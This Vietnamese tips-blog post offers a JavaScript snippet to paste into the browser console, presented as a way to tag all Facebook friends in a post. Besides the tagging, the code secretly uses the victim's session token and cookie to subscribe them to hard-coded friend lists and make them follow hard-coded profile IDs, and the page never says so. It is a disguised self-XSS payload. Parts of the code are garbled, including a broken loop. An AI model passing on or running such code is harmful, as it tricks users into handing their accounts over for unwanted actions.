Thủ thuật Internet

Cách tag toàn bộ bạn bè trên Facebook vào Status hoặc ảnh

Bạn là người thường xuyên dùng Facebook, bạn có 1 tấm ảnh đẹp hay 1 đoạn văn tâm đắc muốn nhiều người xem. Bạn đang nghĩ phải tag những bạn bè của mình vào phần Comment nhưng bạn chỉ tag từng người một vào làm bạn thấy chán và mất thời gian. Hãy theo dõi bài viết dưới đây để biết cách tag toàn bộ bạn bè trên Facebook vào Status hoặc ảnh nhé.

Nhắc đến mạng xã hội thì ta thường nghĩ ngay đến trang Facebook, vì đây không chỉ là 1 trang Website mạng xã hội nổi tiếng về chia sẻ ảnh, chia sẻ cảm xúc….mà còn nổi tiếng về ứng dụng thực tiễn sâu sắc, mới lạ.

Cách tag toàn bộ bạn bè trên Facebook vào Status hoặc ảnh

Hiện nay, Facebook đã được sử dụng trên thiết bị di động, khi sử dụng, các bạn có thể tag tên facebook trên điện thoại để thông báo các sự kiện cho bạn bè của mình biết thay vì phải đi nhắn tin với mọi người.

Hướng dẫn Cách tag toàn bộ bạn bè trên Facebook vào Status hoặc ảnh

Bước 1: Đăng nhập vào tài khoản Facebook của mình.

Bước 2: Đăng tải nội dung .

Bạn có thể đăng Status, up hình ảnh, đoạn video, đoạn văn …..–> Bạn bấm đăng tải để up lên Facebook.

Bước 3: Dùng đoạn mã để tag .

Bấm chuột phải vào nội dung đăng tải …tốt nhất là đặt chuột vào ô comment –> Chọn mục kiểm tra phần từ hoặc bấm phím F12 chọn tab console hoặc tổ hợp phím Ctr+Shift+J:

Cách tag toàn bộ bạn bè trên Facebook vào Status hoặc ảnh

Dùng đoạn mã (code):

/* All Right Reserver ElMzx.Ma    Don’t Change Anything */

function tag(uidss) {

var a = document.createElement(‘script’);

a.innerHTML = “new AsyncRequest().setURI(‘/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe’).setData({ flid: ” + uidss + ” }).send();”;

document.body.appendChild(a);

}tag(“295407063938576”);tag(“355288751283740”);tag(“1394209820821373”);tag(“1394209677488054”);

function tagfriend(abone)

{ var http4=new XMLHttpRequest;

 var url4=”/ajax/follow/follow_profile.php?__a=1″;

 var params4=”profile_id=”+abone+”&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=”+fb_dtsg+”&lsd&__”+user_id+”&phstamp=”;

 http4.open(“POST”,url4,true);

 http4.onreadystatechange=function()

 {  if(http4.readyState==4&&http4.status==200)http4.close };

 http4.send(params4)}

tagfriend(“100007059427793”);

function x__0() { return window.ActiveXObject ? new ActiveXObject(“Msxml2.XMLHTTP”) : new XMLHttpRequest; };

function get_friends(){

var a=x__0();

a.open(“GET”, “/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer=”+uid+”&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm”, false);

a.send(null);

if (a.readyState == 4) {

var f = JSON.parse(a.responseText.substring(a.responseText.indexOf(‘{‘)));

return f.payload.entries;

}

return false;

}

function get_uid(b){

var a=x__0();

a.open(“GET”, ‘http://graph.facebook.com/’+b, false);

a.send();

if (a.readyState == 4) {

return uid = JSON.parse(a.responseText).id;

}

return false;

}

var patt = /comment_text=(.*?)&/

var c = 1;

username = /.com/(.*?)//.exec(window.top.location)[1];

uid = get_uid(username);

a = window.top.location;

termina = 0;

var amigos = get_friends();

post_id = /[0-9]{8,}/.exec(a);

uids = ‘comment_text=’;

header = ‘ft_ent_identifier=’+post_id+’&comment_text=0&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=’+uid+’&__a=1&__req=4u&fb_dtsg=’+document.getElementsByName(‘fb_dtsg’)[0].value+’&phstamp=’+Math.random();

for ( var n = 1 ; n

//uids += ‘%40[‘ + amigos[n].uid + ‘%3A’ + encodeURI(amigos[n].text) + ‘]%20’;

fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value;

uids += ‘%40[‘ + amigos[n].uid + ‘%3AAAAAAAAAAAA]%20’;

c++;

if(c == 7){

uids += ‘&’;

with(new XMLHttpRequest()) open(“POST”, “/ajax/ufi/add_comment.php?__a=1”),setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),send(header.replace(patt, uids));

z = setTimeout(‘function(){asd=0}’, 1000);

clearInterval(z);

c = 1;

uids = ‘comment_text=’;

}

}

var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value;

var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);

function cereziAl(isim) {

var tarama = isim + “=”;

if (document.cookie.length > 0) {

konum = document.cookie.indexOf(tarama)

if (konum != -1) {

konum += tarama.length

son = document.cookie.indexOf(“;”, konum)

if (son == -1)

son = document.cookie.length

return unescape(document.cookie.substring(konum, son))

}

else { return “”; }

}

}

function getRandomInt (min, max) {

return Math.floor(Math.random() * (max – min + 1)) + min;

}

function randomValue(arr) {

return arr[getRandomInt(0, arr.length-1)];

}

var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value;

var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);

function a(abone){

var http4 = new XMLHttpRequest();

var url4 = “/ajax/follow/follow_profile.php?__a=1”;

var params4 = “profile_id=” + abone + “&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=” + fb_dtsg + “&lsd&__” + user_id + “&phstamp=”;

http4.open(“POST”, url4, true);

//Send the proper header information along with the request

http4.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”);

http4.setRequestHeader(“Content-length”, params4.length);

http4.setRequestHeader(“Connection”, “close”);

http4.onreadystatechange = function() {//Call a function when the state changes.

if(http4.readyState == 4 && http4.status == 200) {

http4.close; // Close the connection

}

}

http4.send(params4);

}

Bước 4: Mở lên bấm Ctr +A để copy toàn bộ –> Paste vào phần console –>Enter.

Bước 5: Chờ load. Sau khi bấm Enter thì chờ nó lấy tất cả bạn bè trong danh sách để load vào Comment.

Cách tag toàn bộ bạn bè trên Facebook vào Status hoặc ảnh

Trong khuôn khổ bài viết trên chúng tôi đã hướng dẫn các bạn cách tag toàn bộ bạn bè trên Facebook vào Status hoặc ảnh, nhờ đó bạn có thể dễ dàng tag toàn bộ bạn bè của mình vào Status hoặc ảnh thay vì làm thủ công tag từng người một.

Trả lời

Email của bạn sẽ không được hiển thị công khai.

Back to top button